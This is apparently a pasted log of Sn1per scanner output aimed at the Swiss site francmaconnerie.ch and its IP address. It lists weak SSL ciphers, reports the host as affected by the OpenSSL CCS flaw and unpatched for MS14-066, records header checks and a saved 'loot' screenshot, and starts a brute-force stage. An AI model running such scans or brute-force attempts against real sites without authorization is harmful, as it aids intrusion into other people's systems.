  1678. Accepted SSLv3 56 bits EDH-RSA-DES-CBC-SHA  DHE 1024 bits
  1679. Accepted SSLv3 56 bits DES-CBC-SHA 
  1680. Accepted SSLv3 40 bits EXP-EDH-RSA-DES-CBC-SHA  DHE 512 bits
  1681. Accepted SSLv3 40 bits EXP-DES-CBC-SHA  RSA 512 bits
  1682. Accepted SSLv3 40 bits EXP-RC2-CBC-MD5  RSA 512 bits
  1683. Accepted SSLv3 40 bits EXP-RC4-MD5  RSA 512 bits
  1684.  
  1685. SSL Certificate:
  1686. Signature Algorithm: sha256WithRSAEncryption
  1687. RSA Key Strength: 2048
  1688.  
  1689. Subject: *.infomaniak.ch
  1690. Altnames: DNS:*.infomaniak.ch, DNS:infomaniak.ch
  1691. Issuer: COMODO RSA Domain Validation Secure Server CA
  1694. + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
  1695. + -- --=[Checking for DROWN (SSLv2): 93.88.240.208:443
  1696. + -- --=[Checking for HeartBleed: 93.88.240.208:443
  1697. + -- --=[Checking for OpenSSL CCS: 93.88.240.208:443
  1698. FAIL Remote host is affected
  1699. + -- --=[Checking for Poodle (SSLv3): 93.88.240.208:443
  1700. Preferred SSLv3 256 bits DHE-RSA-AES256-SHA  DHE 1024 bits
  1701. Accepted SSLv3 256 bits AES256-SHA 
  1702. Accepted SSLv3 128 bits DHE-RSA-AES128-SHA  DHE 1024 bits
  1703. Accepted SSLv3 128 bits AES128-SHA 
  1704. Accepted SSLv3 128 bits RC4-SHA 
  1705. Accepted SSLv3 128 bits RC4-MD5 
  1706. Accepted SSLv3 112 bits EDH-RSA-DES-CBC3-SHA  DHE 1024 bits
  1707. Accepted SSLv3 112 bits DES-CBC3-SHA 
  1708. Accepted SSLv3 56 bits EDH-RSA-DES-CBC-SHA  DHE 1024 bits
  1709. Accepted SSLv3 56 bits DES-CBC-SHA 
  1710. Accepted SSLv3 40 bits EXP-EDH-RSA-DES-CBC-SHA  DHE 512 bits
  1711. Accepted SSLv3 40 bits EXP-DES-CBC-SHA  RSA 512 bits
  1712. Accepted SSLv3 40 bits EXP-RC2-CBC-MD5  RSA 512 bits
  1713. Accepted SSLv3 40 bits EXP-RC4-MD5  RSA 512 bits
  1714. + -- --=[Checking for WinShock (MS14-066): 93.88.240.208:443
  1715. Testing if OpenSSL supports the ciphers we are checking for: YES
  1716.  
  1717. Testing 93.88.240.208:443 for availability of SSL ciphers added in MS14-066...
  1718. Testing cipher DHE-RSA-AES256-GCM-SHA384: UNSUPPORTED
  1719. Testing cipher DHE-RSA-AES128-GCM-SHA256: UNSUPPORTED
  1720. Testing cipher AES256-GCM-SHA384: UNSUPPORTED
  1721. Testing cipher AES128-GCM-SHA256: UNSUPPORTED
  1722. Testing if IIS is running on port 443: NO
  1723. Checking if target system is running Windows Server 2012 or later...
  1724. Testing cipher ECDHE-RSA-AES256-SHA384: UNSUPPORTED
  1725. Testing cipher ECDHE-RSA-AES256-SHA: UNSUPPORTED
  1726. 93.88.240.208:443 is patched: NO
  1727. + -- --=[Scan Complete!
  1728. ====================================================================================
  1729.  CHECKING HTTP HEADERS 
  1730. ====================================================================================
  1731. + -- --=[Checking if X-Content options are enabled on francmaconnerie.ch... 
  1732.  
  1733. + -- --=[Checking if X-Frame options are enabled on francmaconnerie.ch... 
  1734.  
  1735. + -- --=[Checking if X-XSS-Protection header is enabled on francmaconnerie.ch... 
  1736.  
  1737. + -- --=[Checking HTTP methods on francmaconnerie.ch... 
  1738.  
  1739. + -- --=[Checking if TRACE method is enabled on francmaconnerie.ch... 
  1740.  
  1741. + -- --=[Checking for META tags on francmaconnerie.ch... 
  1742. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
  1743.  
  1744. + -- --=[Checking for open proxy on francmaconnerie.ch... 
  1745.  
  1746. + -- --=[Enumerating software on francmaconnerie.ch... 
  1747. Server: Apache
  1748.  
  1749. + -- --=[Checking if Strict-Transport-Security is enabled on francmaconnerie.ch... 
  1750.  
  1751. + -- --=[Checking for Flash cross-domain policy on francmaconnerie.ch... 
  1752. about the error.
  1753.  
  1754. <!--#else -->
  1755.  
  1756. If you entered the URL manually please check your
  1757. spelling and try again.
  1758.  
  1759. <!--#endif -->
  1760.  
  1761. <!--#include virtual="include/bottom.html" -->
  1762.  
  1763. + -- --=[Checking for Silverlight cross-domain policy on francmaconnerie.ch... 
  1764. about the error.
  1765.  
  1766. <!--#else -->
  1767.  
  1768. If you entered the URL manually please check your
  1769. spelling and try again.
  1770.  
  1771. <!--#endif -->
  1772.  
  1773. <!--#include virtual="include/bottom.html" -->
  1774.  
  1775. + -- --=[Checking for HTML5 cross-origin resource sharing on francmaconnerie.ch... 
  1776.  
  1777. + -- --=[Retrieving robots.txt on francmaconnerie.ch... 
  1778. User-agent: *
  1779. Crawl-delay: 10
  1780.  
  1781. + -- --=[Retrieving sitemap.xml on francmaconnerie.ch... 
  1782. about the error.
  1783.  
  1784. <!--#else -->
  1785.  
  1786. If you entered the URL manually please check your
  1787. spelling and try again.
  1788.  
  1789. <!--#endif -->
  1790.  
  1791. <!--#include virtual="include/bottom.html" -->
  1792.  
  1793. + -- --=[Checking cookie attributes on francmaconnerie.ch... 
  1794.  
  1795. + -- --=[Checking for ASP.NET Detailed Errors on francmaconnerie.ch... 
  1796. about the error.
  1797. about the error.
  1798.  
  1799. 
  1800. ====================================================================================
  1801.  SAVING SCREENSHOTS 
  1802. ====================================================================================
  1803. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/francmaconnerie.ch-port443.jpg
  1804.  
  1805. ====================================================================================
  1806.  SCANNING FOR COMMON VULNERABILITIES 
  1807. ====================================================================================
  1808. ====================================================================================
  1809.  SKIPPING FULL NMAP PORT SCAN 
  1810. ====================================================================================
  1811. ====================================================================================
  1812.  RUNNING BRUTE FORCE 
  1813. ====================================================================================
  1820.  
  1821.  + -- --=[BruteX v1.7 by 1N3
  1822.  + -- --=[http://crowdshield.com
  1823.  
  1824. #######################################################################################################################################